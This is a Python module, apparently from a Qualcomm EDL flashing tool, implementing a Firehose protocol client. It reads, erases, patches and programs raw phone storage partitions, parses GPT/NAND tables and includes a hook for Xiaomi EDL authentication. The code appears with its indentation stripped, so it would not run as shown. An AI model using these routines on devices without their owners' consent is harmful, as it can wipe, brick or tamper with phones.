def write(self, data):
self.writequeue.put_nowait(data)
def stop(self):
self.stopthreads = True
self.writequeue.join()
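# Client for the Qualcomm Firehose flashing protocol: builds the XML commands
# (<program>, <read>, <patch>, <power>, <nop>, ...) and moves the raw sector
# data over the EDL USB/CDC connection.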
class firehose(metaclass=LogBase):
class cfg:
TargetName = ""
Version = ""
ZLPAwareHost = 1
SkipStorageInit = 0
SkipWrite = 0
MaxPayloadSizeToTargetInBytes = 1048576
MaxPayloadSizeFromTargetInBytes = 8192
MaxXMLSizeInBytes = 4096
bit64 = True
total_blocks = 0
block_size = 0
SECTOR_SIZE_IN_BYTES = 0
MemoryName = "eMMC"
prod_name = "Unknown"
maxlun = 99
def __init__(self, cdc, xml, cfg, loglevel, devicemodel, serial, skipresponse, luns, args):
self.cdc = cdc
self.lasterror = b""
self.loglevel = loglevel
self.args = args
self.xml = xml
self.cfg = cfg
self.prog = 0
self.progtime = 0
self.progpos = 0
self.pk = None
self.modules = None
self.serial = serial
self.devicemodel = devicemodel
self.skipresponse = skipresponse
self.luns = luns
self.supported_functions = []
self.lunsizes = {}
self.info = self.__logger.info
self.error = self.__logger.error
self.debug = self.__logger.debug
self.warning = self.__logger.warning
self.__logger.setLevel(loglevel)
if loglevel == logging.DEBUG:
logfilename = "log.txt"
fh = logging.FileHandler(logfilename)
self.__logger.addHandler(fh)
self.nandparttbl = None
self.nandpart = nand_partition(parent=self, printer=print)
def detect_partition(self, arguments, partitionname):
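# Walk every LUN's GPT looking for `partitionname`; returns [True, lun, entry]
# on a hit, otherwise [False, {"LunN": [partition names]}].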
fpartitions = {}
for lun in self.luns:
lunname = "Lun" + str(lun)
fpartitions[lunname] = []
data, guid_gpt = self.get_gpt(lun, int(arguments["--gpt-num-part-entries"]),
int(arguments["--gpt-part-entry-size"]),
int(arguments["--gpt-part-entry-start-lba"]))
if guid_gpt is None:
break
else:
if partitionname in guid_gpt.partentries:
return [True, lun, guid_gpt.partentries[partitionname]]
for part in guid_gpt.partentries:
fpartitions[lunname].append(part)
return [False, fpartitions]
def getstatus(self, resp):
if "value" in resp:
value = resp["value"]
if value == "ACK":
return True
else:
return False
return True
def decoder(self, data):
if isinstance(data, bytes) or isinstance(data, bytearray):
if data[:5] == b"<?xml":
try:
rdata = ""
for line in data.split(b"\n"):
try:
rdata += line.decode('utf-8') + "\n"
except Exception as err:
self.debug(str(err))
rdata += hexlify(line).decode('utf-8') + "\n"
return rdata
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
pass
return data
def xmlsend(self, data, skipresponse=False):
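# Send one XML command over the CDC endpoint; unless skipresponse is set,
# poll for the <response> element and return [ack, parsed response, raw data].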
if isinstance(data, bytes) or isinstance(data, bytearray):
self.cdc.write(data[:self.cfg.MaxXMLSizeInBytes])
else:
self.cdc.write(bytes(data, 'utf-8')[:self.cfg.MaxXMLSizeInBytes])
# time.sleep(0.01)
rdata = bytearray()
counter = 0
timeout = 30
resp = {"value": "NAK"}
status = False
if not skipresponse:
while b"<response value" not in rdata:
try:
tmp = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if tmp == b"" in rdata:
counter += 1
time.sleep(0.05)
if counter > timeout:
break
rdata += tmp
except Exception as err:
self.error(err)
return [False, resp, data]
try:
if b"raw hex token" in rdata:
rdata = rdata  # no-op: "raw hex token" responses are left untouched before parsing
try:
resp = self.xml.getresponse(rdata)
except Exception as e: # pylint: disable=broad-except
rdata = bytes(self.decoder(rdata), 'utf-8')
resp = self.xml.getresponse(rdata)
status = self.getstatus(resp)
except Exception as err:
status = True
self.debug(str(err))
if isinstance(rdata, bytes) or isinstance(rdata, bytearray):
try:
self.debug("Error on getting xml response:" + rdata.decode('utf-8'))
except Exception as err:
self.debug("Error on getting xml response:" + hexlify(rdata).decode('utf-8') +
", Error: " + str(err))
elif isinstance(rdata, str):
self.debug("Error on getting xml response:" + rdata)
return [status, {"value": "NAK"}, rdata]
else:
status = True
resp = {"value": "ACK"}
return [status, resp, rdata]
def cmd_reset(self):
data = "<?xml version=\"1.0\" ?><data><power value=\"reset\"/></data>"
val = self.xmlsend(data)
try:
v = None
while v != b'':
v = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if v != b'':
resp = self.xml.getlog(v)[0]
else:
break
print(resp)
except Exception as err:
self.error(str(err))
pass
if val[0]:
self.info("Reset succeeded.")
return True
else:
self.error("Reset failed.")
return False
def cmd_xml(self, filename):
with open(filename, 'rb') as rf:
data = rf.read()
val = self.xmlsend(data)
if val[0]:
self.info("Command succeeded." + str(val[2]))
return val[2]
else:
self.error("Command failed:" + str(val[2]))
return val[2]
def cmd_nop(self):
data = "<?xml version=\"1.0\" ?><data><nop /></data>"
self.xmlsend(data, True)
info = b""
tmp = None
while tmp != b"":
tmp = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if tmp == b"":
break
info += tmp
if info != b"":
self.info("Nop succeeded.")
return self.xml.getlog(info)
else:
self.error("Nop failed.")
return False
def cmd_getsha256digest(self, physical_partition_number, start_sector, num_partition_sectors):
data = f"<?xml version=\"1.0\" ?><data><getsha256digest" + \
f" SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\"/>\n</data>"
val = self.xmlsend(data)
if val[0]:
res = self.xml.getlog(val[2])
for line in res:
self.info(line)
if "Digest " in res:
return res.split("Digest ")[1]
else:
return res
else:
self.error("GetSha256Digest failed.")
return False
def cmd_setbootablestoragedrive(self, partition_number):
data = f"<?xml version=\"1.0\" ?><data>\n<setbootablestoragedrive value=\"{str(partition_number)}\" /></data>"
val = self.xmlsend(data)
if val[0]:
self.info("Setbootablestoragedrive succeeded.")
return True
else:
self.error("Setbootablestoragedrive failed: %s" % val[2])
return False
def cmd_send(self, content, response=True):
data = f"<?xml version=\"1.0\" ?><data>\n<{content} /></data>"
if response:
val = self.xmlsend(data)
if val[0] and b"log value=\"ERROR\"" not in val[1]:
return val[2]
else:
self.error(f"{content} failed.")
self.error(f"{val[2]}")
return val[1]
else:
self.xmlsend(data, True)
return True
def cmd_patch(self, physical_partition_number, start_sector, byte_offset, value, size_in_bytes, display=True):
"""
<patch SECTOR_SIZE_IN_BYTES="512" byte_offset="16" filename="DISK" physical_partition_number="0"
size_in_bytes="4" start_sector="NUM_DISK_SECTORS-1." value="0" what="Zero Out Header CRC in Backup Header."/>
"""
data = f"<?xml version=\"1.0\" ?><data>\n" + \
f"<patch SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" byte_offset=\"{byte_offset}\"" + \
f" filename=\"DISK\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" size_in_bytes=\"{size_in_bytes}\" " + \
f" start_sector=\"{start_sector}\" " + \
f" value=\"{value}\" "
if self.modules is not None:
data += self.modules.addpatch()
data += f"/>\n</data>"
rsp = self.xmlsend(data)
if rsp[0]:
if display:
self.info(f"Patch:\n--------------------\n")
self.info(rsp[1])
return True
else:
self.error(f"Error:{rsp}")
return False
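# Example call (hypothetical values, mirroring the XML in the docstring above):
#   self.cmd_patch(physical_partition_number=0, start_sector="NUM_DISK_SECTORS-1.",
#                  byte_offset=16, value=0, size_in_bytes=4)
# would zero out the header CRC of the backup GPT header.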
def wait_for_data(self):
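# Poll the CDC endpoint until a '<response value=...>' tag arrives, giving up
# after a few consecutive empty reads.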
tmp = bytearray()
timeout = 0
while b'response value' not in tmp:
res = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if res == b'':
timeout += 1
if timeout == 4:
break
time.sleep(0.1)
tmp += res
return tmp
def cmd_program(self, physical_partition_number, start_sector, filename, display=True):
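# Stream an image file (raw or QC sparse) into the target partition: announce
# the transfer with a <program> XML tag, then push MaxPayloadSizeToTargetInBytes
# chunks, zero-padding the final chunk up to a full sector.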
total = os.stat(filename).st_size
sparse = QCSparse(filename, self.loglevel)
sparseformat = False
if sparse.readheader():
sparseformat = True
total = sparse.getsize()
bytestowrite = total
progbar = progress(self.cfg.SECTOR_SIZE_IN_BYTES)
with open(filename, "rb") as rf:
# Make sure we fill data up to the sector size
num_partition_sectors = total // self.cfg.SECTOR_SIZE_IN_BYTES
if (total % self.cfg.SECTOR_SIZE_IN_BYTES) != 0:
num_partition_sectors += 1
if display:
self.info(f"\nWriting to physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
data = f"<?xml version=\"1.0\" ?><data>\n" + \
f"<program SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\" "
if self.modules is not None:
data += self.modules.addprogram()
data += f"/>\n</data>"
rsp = self.xmlsend(data, self.skipresponse)
progbar.show_progress(prefix="Write", pos=0, total=total, display=display)
if rsp[0]:
old = 0
while bytestowrite > 0:
wlen = min(bytestowrite, self.cfg.MaxPayloadSizeToTargetInBytes)
if sparseformat:
wdata = sparse.read(wlen)
else:
wdata = rf.read(wlen)
bytestowrite -= wlen
if wlen % self.cfg.SECTOR_SIZE_IN_BYTES != 0:
filllen = (wlen // self.cfg.SECTOR_SIZE_IN_BYTES * self.cfg.SECTOR_SIZE_IN_BYTES) + \
self.cfg.SECTOR_SIZE_IN_BYTES
wdata += b"\x00" * (filllen - wlen)
self.cdc.write(wdata)
progbar.show_progress(prefix="Write", pos=total - bytestowrite, total=total, display=display)
self.cdc.write(b'')
# time.sleep(0.2)
wd = self.wait_for_data()
log = self.xml.getlog(wd)
rsp = self.xml.getresponse(wd)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in log:
self.error(line)
return False
else:
self.error(f"Error:{rsp}")
return False
return True
def cmd_program_buffer(self, physical_partition_number, start_sector, wfdata, display=True):
bytestowrite = len(wfdata)
total = bytestowrite
# Make sure we fill data up to the sector size
num_partition_sectors = bytestowrite // self.cfg.SECTOR_SIZE_IN_BYTES
if (bytestowrite % self.cfg.SECTOR_SIZE_IN_BYTES) != 0:
num_partition_sectors += 1
if display:
self.info(f"\nWriting to physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
data = f"<?xml version=\"1.0\" ?><data>\n" + \
f"<program SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\" "
if self.modules is not None:
data += self.modules.addprogram()
data += f"/>\n</data>"
rsp = self.xmlsend(data, self.skipresponse)
progbar = progress(self.cfg.SECTOR_SIZE_IN_BYTES)
progbar.show_progress(prefix="Write", pos=0, total=total, display=display)
if rsp[0]:
old = 0
pos = 0
while bytestowrite > 0:
wlen = min(bytestowrite, self.cfg.MaxPayloadSizeToTargetInBytes)
wrdata = wfdata[pos:pos + wlen]
pos += wlen
bytestowrite -= wlen
if wlen % self.cfg.SECTOR_SIZE_IN_BYTES != 0:
filllen = (wlen // self.cfg.SECTOR_SIZE_IN_BYTES * self.cfg.SECTOR_SIZE_IN_BYTES) + \
self.cfg.SECTOR_SIZE_IN_BYTES
wrdata += b"\x00" * (filllen - wlen)
self.cdc.write(wrdata)
progbar.show_progress(prefix="Write", pos=total - bytestowrite, total=total, display=display)
self.cdc.write(b'')
# time.sleep(0.2)
wd = self.wait_for_data()
log = self.xml.getlog(wd)
rsp = self.xml.getresponse(wd)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in log:
self.error(line)
return False
else:
self.error(f"Error:{rsp}")
return False
return True
def cmd_erase(self, physical_partition_number, start_sector, num_partition_sectors, display=True):
if display:
self.info(f"\nErasing from physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
data = f"<?xml version=\"1.0\" ?><data>\n" + \
f"<program SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\" "
if self.modules is not None:
data += self.modules.addprogram()
data += f"/>\n</data>"
rsp = self.xmlsend(data, self.skipresponse)
empty = b"\x00" * self.cfg.MaxPayloadSizeToTargetInBytes
pos = 0
bytestowrite = self.cfg.SECTOR_SIZE_IN_BYTES * num_partition_sectors
total = self.cfg.SECTOR_SIZE_IN_BYTES * num_partition_sectors
progbar = progress(self.cfg.MaxPayloadSizeToTargetInBytes)
progbar.show_progress(prefix="Erase", pos=0, total=total, display=display)
if rsp[0]:
while bytestowrite > 0:
wlen = min(bytestowrite, self.cfg.MaxPayloadSizeToTargetInBytes)
self.cdc.write(empty[:wlen])
progbar.show_progress(prefix="Erase", pos=total - bytestowrite, total=total, display=display)
bytestowrite -= wlen
pos += wlen
self.cdc.write(b'')
res = self.wait_for_data()
info = self.xml.getlog(res)
rsp = self.xml.getresponse(res)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in info:
self.error(line)
return False
else:
self.error(f"Error:{rsp}")
return False
return True
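# cmd_read streams sectors from the device straight into a file opened with a
# large write buffer; cmd_read_buffer further below is the in-memory variant used
# for small reads such as GPT parsing.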
def cmd_read(self, physical_partition_number, start_sector, num_partition_sectors, filename, display=True):
self.lasterror = b""
prog = 0
progbar = progress(self.cfg.SECTOR_SIZE_IN_BYTES)
if display:
self.info(
f"\nReading from physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
with open(file=filename, mode="wb", buffering=self.cfg.MaxPayloadSizeFromTargetInBytes) as wr:
data = f"<?xml version=\"1.0\" ?><data><read SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\"/>\n</data>"
rsp = self.xmlsend(data, self.skipresponse)
# time.sleep(0.01)
if rsp[0]:
if "value" in rsp[1]:
if rsp[1]["value"] == "NAK":
if display:
self.error(rsp[2].decode('utf-8'))
return b""
bytestoread = self.cfg.SECTOR_SIZE_IN_BYTES * num_partition_sectors
total = bytestoread
show_progress = progbar.show_progress
usb_read = self.cdc.read
progbar.show_progress(prefix="Read", pos=0, total=total, display=display)
while bytestoread > 0:
size = min(self.cfg.MaxPayloadSizeToTargetInBytes, bytestoread)
data = usb_read(size)
wr.write(data)
bytestoread -= len(data)
show_progress(prefix="Read", pos=total - bytestoread, total=total, display=display)
# time.sleep(0.2)
wd = self.wait_for_data()
info = self.xml.getlog(wd)
rsp = self.xml.getresponse(wd)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in info:
self.error(line)
self.lasterror += bytes(line + "\n", "utf-8")
return False
else:
if display:
self.error(f"Error:{rsp[2]}")
return False
if display and prog != 100:
print_progress(100, 100, prefix='Progress:', suffix='Complete', bar_length=50)
return True
def cmd_read_buffer(self, physical_partition_number, start_sector, num_partition_sectors, display=True):
self.lasterror = b""
prog = 0
if display:
self.info(
f"\nReading from physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
print_progress(prog, 100, prefix='Progress:', suffix='Complete', bar_length=50)
data = f"<?xml version=\"1.0\" ?><data><read SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\"/>\n</data>"
progbar = progress(self.cfg.SECTOR_SIZE_IN_BYTES)
rsp = self.xmlsend(data, self.skipresponse)
resData = bytearray()
if rsp[0]:
if "value" in rsp[1]:
if rsp[1]["value"] == "NAK":
if display:
self.error(rsp[2].decode('utf-8'))
return -1
bytestoread = self.cfg.SECTOR_SIZE_IN_BYTES * num_partition_sectors
total = bytestoread
if display:
progbar.show_progress(prefix="Read", pos=total - bytestoread, total=total, display=display)
while bytestoread > 0:
tmp = self.cdc.read(min(self.cdc.EP_IN.wMaxPacketSize, bytestoread))
size = len(tmp)
bytestoread -= size
resData.extend(tmp)
progbar.show_progress(prefix="Read", pos=total - bytestoread, total=total, display=display)
wd = self.wait_for_data()
info = self.xml.getlog(wd)
rsp = self.xml.getresponse(wd)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in info:
self.error(line)
return resData
else:
if len(rsp) > 1:
if b"Failed to open the UFS Device" in rsp[2]:
self.error(f"Error:{rsp[2]}")
self.lasterror = rsp[2]
return resData
if len(rsp) > 2 and not rsp[0]:
self.lasterror = rsp[2]
if display and prog != 100:
progbar.show_progress(prefix="Read", pos=total, total=total, display=display)
return resData # Do not remove, needed for oneplus
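# get_gpt reads the first two sectors of a LUN and decides between a NAND
# partition table (magic 0x844bdcd1) and a regular GPT ("EFI PART" signature),
# then re-reads as many sectors as the partition entry array needs (capped at 64).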
def get_gpt(self, lun, gpt_num_part_entries, gpt_part_entry_size, gpt_part_entry_start_lba):
try:
data = self.cmd_read_buffer(lun, 0, 2, False)
except Exception as err:
self.debug(str(err))
self.skipresponse = True
data = self.cmd_read_buffer(lun, 0, 2, False)
if data == b"" or data == -1:
return None, None
magic = unpack("<I", data[0:4])[0]
if magic == 0x844bdcd1:
self.info("Nand storage detected. Trying to find partition table")
if self.nandpart.partitiontblsector is None:
for sector in range(0, 1024):
data = self.cmd_read_buffer(0, sector, 1, False)
if data[0:8] != b"\xac\x9f\x56\xfe\x7a\x12\x7f\xcd":
continue
self.nandpart.partitiontblsector = sector
if self.nandpart.partitiontblsector is not None:
data = self.cmd_read_buffer(0, self.nandpart.partitiontblsector + 1, 2, False)
if self.nandpart.parse(data):
return data, self.nandpart
return None, None
else:
guid_gpt = gpt(
num_part_entries=gpt_num_part_entries,
part_entry_size=gpt_part_entry_size,
part_entry_start_lba=gpt_part_entry_start_lba,
loglevel=self.__logger.level
)
try:
header = guid_gpt.parseheader(data, self.cfg.SECTOR_SIZE_IN_BYTES)
if header.signature == b"EFI PART":
gptsize = (header.part_entry_start_lba * self.cfg.SECTOR_SIZE_IN_BYTES) + (
header.num_part_entries * header.part_entry_size)
sectors = gptsize // self.cfg.SECTOR_SIZE_IN_BYTES
if gptsize % self.cfg.SECTOR_SIZE_IN_BYTES != 0:
sectors += 1
if sectors == 0:
return None, None
if sectors > 64:
sectors = 64
data = self.cmd_read_buffer(lun, 0, sectors, False)
if data == b"":
return None, None
guid_gpt.parse(data, self.cfg.SECTOR_SIZE_IN_BYTES)
return data, guid_gpt
else:
return None, None
except Exception as err:
self.debug(str(err))
return None, None
def get_backup_gpt(self, lun, gpt_num_part_entries, gpt_part_entry_size, gpt_part_entry_start_lba):
data = self.cmd_read_buffer(lun, 0, 2, False)
if data == b"":
return None
guid_gpt = gpt(
num_part_entries=gpt_num_part_entries,
part_entry_size=gpt_part_entry_size,
part_entry_start_lba=gpt_part_entry_start_lba,
loglevel=self.__logger.level
)
header = guid_gpt.parseheader(data, self.cfg.SECTOR_SIZE_IN_BYTES)
if "backup_lba" in header:
sectors = header.first_usable_lba - 1
data = self.cmd_read_buffer(lun, header.backup_lba, sectors, False)
if data == b"":
return None
return data
else:
return None
def calc_offset(self, sector, offset):
sector = sector + (offset // self.cfg.SECTOR_SIZE_IN_BYTES)
offset = offset % self.cfg.SECTOR_SIZE_IN_BYTES
return sector, offset
def getluns(self, argument):
if argument["--lun"] is not None:
return [int(argument["--lun"])]
luns = []
if self.cfg.MemoryName.lower() == "ufs":
for i in range(0, self.cfg.maxlun):
luns.append(i)
else:
luns = [0]
return luns
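# configure() performs the Firehose handshake: it sends a <configure> request,
# adopts the limits the loader reports (payload sizes, memory type, target name)
# and falls back between eMMC/UFS and 512/4096-byte sectors based on the error
# strings returned by a probe read.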
def configure(self, lvl):
if self.cfg.SECTOR_SIZE_IN_BYTES == 0:
if self.cfg.MemoryName.lower() == "emmc":
self.cfg.SECTOR_SIZE_IN_BYTES = 512
else:
self.cfg.SECTOR_SIZE_IN_BYTES = 4096
connectcmd = f"<?xml version =\"1.0\" ?><data>" + \
f"<configure MemoryName=\"{self.cfg.MemoryName}\" " + \
f"ZLPAwareHost=\"{str(self.cfg.ZLPAwareHost)}\" " + \
f"SkipStorageInit=\"{str(int(self.cfg.SkipStorageInit))}\" " + \
f"SkipWrite=\"{str(int(self.cfg.SkipWrite))}\" " + \
f"Verbose=\"True\" " + \
f"MaxPayloadSizeToTargetInBytes=\"{str(self.cfg.MaxPayloadSizeToTargetInBytes)}\"/>" + \
"</data>"
'''
"<?xml version=\"1.0\" encoding=\"UTF-8\" ?><data><response value=\"ACK\" MinVersionSupported=\"1\"" \
"MemoryName=\"eMMC\" MaxPayloadSizeFromTargetInBytes=\"4096\" MaxPayloadSizeToTargetInBytes=\"1048576\" " \
"MaxPayloadSizeToTargetInBytesSupported=\"1048576\" MaxXMLSizeInBytes=\"4096\" Version=\"1\"
TargetName=\"8953\" />" \
"</data>"
'''
rsp = self.xmlsend(connectcmd)
if len(rsp) > 1:
if not rsp[0]:
if b"Only nop and sig tag can be" in rsp[2]:
self.info("Xiaomi EDL Auth detected.")
try:
self.modules = modules(fh=self, serial=self.serial,
supported_functions=self.supported_functions,
loglevel=self.__logger.level,
devicemodel=self.devicemodel, args=self.args)
except Exception as err: # pylint: disable=broad-except
self.modules = None
if self.modules.edlauth():
rsp = self.xmlsend(connectcmd)
if len(rsp) > 1:
if rsp[0] and rsp[1] != {}: # On Ack
info = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if "MemoryName" not in rsp[1]:
# print(rsp[1])
rsp[1]["MemoryName"] = "eMMC"
if "MaxXMLSizeInBytes" not in rsp[1]:
rsp[1]["MaxXMLSizeInBytes"] = "4096"
self.warning("Couldn't detect MaxPayloadSizeFromTargetinBytes")
if "MaxPayloadSizeToTargetInBytes" not in rsp[1]:
rsp[1]["MaxPayloadSizeToTargetInBytes"] = "1038576"
if "MaxPayloadSizeToTargetInBytesSupported" not in rsp[1]:
rsp[1]["MaxPayloadSizeToTargetInBytesSupported"] = "1038576"
if rsp[1]["MemoryName"].lower() != self.cfg.MemoryName.lower():
self.warning("Memory type was set as " + self.cfg.MemoryName + " but device reported it is " +
rsp[1]["MemoryName"] + " instead.")
self.cfg.MemoryName = rsp[1]["MemoryName"]
self.cfg.MaxPayloadSizeToTargetInBytes = int(rsp[1]["MaxPayloadSizeToTargetInBytes"])
self.cfg.MaxPayloadSizeToTargetInBytesSupported = int(rsp[1]["MaxPayloadSizeToTargetInBytesSupported"])
self.cfg.MaxXMLSizeInBytes = int(rsp[1]["MaxXMLSizeInBytes"])
if "MaxPayloadSizeFromTargetInBytes" in rsp[1]:
self.cfg.MaxPayloadSizeFromTargetInBytes = int(rsp[1]["MaxPayloadSizeFromTargetInBytes"])
else:
self.cfg.MaxPayloadSizeFromTargetInBytes = self.cfg.MaxXMLSizeInBytes
self.warning("Couldn't detect MaxPayloadSizeFromTargetinBytes")
if "TargetName" in rsp[1]:
self.cfg.TargetName = rsp[1]["TargetName"]
if "MSM" not in self.cfg.TargetName:
self.cfg.TargetName = "MSM" + self.cfg.TargetName
else:
self.cfg.TargetName = "Unknown"
self.warning("Couldn't detect TargetName")
if "Version" in rsp[1]:
self.cfg.Version = rsp[1]["Version"]
else:
self.cfg.Version = 0
self.warning("Couldn't detect Version")
else: # on NAK
if b"ERROR" in rsp[2]:
self.error(rsp[2].decode('utf-8'))
sys.exit()
if "MaxPayloadSizeToTargetInBytes" in rsp[1]:
try:
self.cfg.MemoryName = rsp[1]["MemoryName"]
self.cfg.MaxPayloadSizeToTargetInBytes = int(rsp[1]["MaxPayloadSizeToTargetInBytes"])
self.cfg.MaxPayloadSizeToTargetInBytesSupported = int(
rsp[1]["MaxPayloadSizeToTargetInBytesSupported"])
self.cfg.MaxXMLSizeInBytes = int(rsp[1]["MaxXMLSizeInBytes"])
self.cfg.MaxPayloadSizeFromTargetInBytes = int(rsp[1]["MaxPayloadSizeFromTargetInBytes"])
self.cfg.TargetName = rsp[1]["TargetName"]
if "MSM" not in self.cfg.TargetName:
self.cfg.TargetName = "MSM" + self.cfg.TargetName
self.cfg.Version = rsp[1]["Version"]
if lvl == 0:
return self.configure(lvl + 1)
else:
self.error(f"Error:{rsp}")
sys.exit()
except Exception as e:
pass
self.info(f"TargetName={self.cfg.TargetName}")
self.info(f"MemoryName={self.cfg.MemoryName}")
self.info(f"Version={self.cfg.Version}")
rsp = self.cmd_read_buffer(0, 1, 1, False)
if rsp == b"" and self.args["--memory"] is None:
if b"Failed to open the SDCC Device" in self.lasterror:
self.warning(
"Memory type eMMC doesn't seem to match (Failed to init). Trying to use UFS instead.")
self.cfg.MemoryName = "UFS"
return self.configure(0)
if b"ERROR: Failed to initialize (open whole lun) UFS Device slot" in self.lasterror:
self.warning(
"Memory type UFS doesn't seem to match (Failed to init). Trying to use eMMC instead.")
self.cfg.MemoryName = "eMMC"
return self.configure(0)
elif b"Attribute \'SECTOR_SIZE_IN_BYTES\'=4096 must be equal to disk sector size 512" in self.lasterror:
self.cfg.SECTOR_SIZE_IN_BYTES = 512
elif b"Attribute \'SECTOR_SIZE_IN_BYTES\'=512 must be equal to disk sector size 4096" in self.lasterror:
self.cfg.SECTOR_SIZE_IN_BYTES = 4096
self.luns = self.getluns(self.args)
return True
def getlunsize(self, lun):
if lun not in self.lunsizes:
try:
data, guid_gpt = self.get_gpt(lun, int(self.args["--gpt-num-part-entries"]),
int(self.args["--gpt-part-entry-size"]),
int(self.args["--gpt-part-entry-start-lba"]))
self.lunsizes[lun] = guid_gpt.totalsectors
except Exception as e:
self.error(e)
return -1
else:
return self.lunsizes[lun]
return guid_gpt.totalsectors
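# get_supported_functions parses the loader's NOP log output for the chip serial
# number and the advertised "Supported Functions" list, falling back to a generic
# Qualcomm command set when nothing is reported.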
def get_supported_functions(self):
supfunc = False
info = self.cmd_nop()
if not info:
self.info("No supported functions detected, configuring qc generic commands")
self.supported_functions = ['configure', 'program', 'firmwarewrite', 'patch', 'setbootablestoragedrive',
'ufs', 'emmc', 'power', 'benchmark', 'read', 'getstorageinfo',
'getcrc16digest', 'getsha256digest', 'erase', 'peek', 'poke', 'nop', 'xml']
else:
self.supported_functions = []
for line in info:
if "chip serial num" in line.lower():
self.info(line)
try:
serial = line.split("0x")[1][:-1]
self.serial = int(serial, 16)
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
serial = line.split(": ")[2]
self.serial = int(serial.split(" ")[0])
if supfunc and "end of supported functions" not in line.lower():
rs = line.replace("\n", "")
if rs != "":
rs = rs.replace("INFO: ", "")
self.supported_functions.append(rs)
if "supported functions" in line.lower():
supfunc = True
if len(self.supported_functions) > 1:
info = "Supported Functions: "
for line in self.supported_functions:
info += line + ","
self.info(info[:-1])
data = self.cdc.read(self.cfg.MaxXMLSizeInBytes) # logbuf
try:
self.info(data.decode('utf-8'))
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
pass
if not self.supported_functions:
self.supported_functions = ['configure', 'program', 'firmwarewrite', 'patch', 'setbootablestoragedrive',
'ufs', 'emmc', 'power', 'benchmark', 'read', 'getstorageinfo',
'getcrc16digest', 'getsha256digest', 'erase', 'peek', 'poke', 'nop', 'xml']
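# connect() drains any pending log data from the loader, recovers cached
# serial/function info from edl_config.json when available, augments the function
# list by scanning the programmer binary for known OEM command strings, and pulls
# storage geometry via getstorageinfo when supported.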
def connect(self):
v = b'-1'
if platform.system() == 'Windows':
self.cdc.timeout = 50
elif platform.system() == 'Darwin':
# must ensure the timeout is enough to fill the buffer we alloc
# which is 1MB, otherwise some data are dropped in the underlying usb libraries
self.cdc.timeout = 50
else:
self.cdc.timeout = 50
info = []
while v != b'':
try:
v = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if v == b'':
break
data = self.xml.getlog(v)
if len(data) > 0:
info.append(data[0])
if not info:
break
except Exception as err: # pylint: disable=broad-except
pass
if info == [] or (len(info) > 0 and 'ERROR' in info[0]):
if len(info) > 0:
self.debug(info[0])
if self.serial is None or self.supported_functions == []:
try:
if os.path.exists("edl_config.json"):
pinfo = json.loads(open("edl_config.json", "rb").read())
if self.supported_functions == []:
if "supported_functions" in pinfo:
self.supported_functions = pinfo["supported_functions"]
if self.serial is None:
if "serial" in pinfo:
self.serial = pinfo["serial"]
else:
self.get_supported_functions()
except:
self.get_supported_functions()
pass
else:
supfunc = False
for line in info:
if "chip serial num" in line.lower():
self.info(line)
try:
serial = line.split("0x")[1][:-1]
self.serial = int(serial, 16)
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
serial = line.split(": ")[2]
self.serial = int(serial.split(" ")[0])
if supfunc and "end of supported functions" not in line.lower():
rs = line.replace("\n", "")
if rs != "":
rs = rs.replace("INFO: ", "")
self.supported_functions.append(rs)
if "supported functions" in line.lower():
supfunc = True
try:
if os.path.exists(self.cfg.programmer):
data = open(self.cfg.programmer, "rb").read()
for cmd in [b"demacia", b"setprojmodel", b"setswprojmodel", b"setprocstart", b"SetNetType"]:
if cmd in data:
self.supported_functions.append(cmd.decode('utf-8'))
state = {
"supported_functions": self.supported_functions,
"programmer": self.cfg.programmer,
"serial": self.serial
}
open("edl_config.json", "w").write(json.dumps(state))
except:
pass
# rsp = self.xmlsend(data, self.skipresponse)
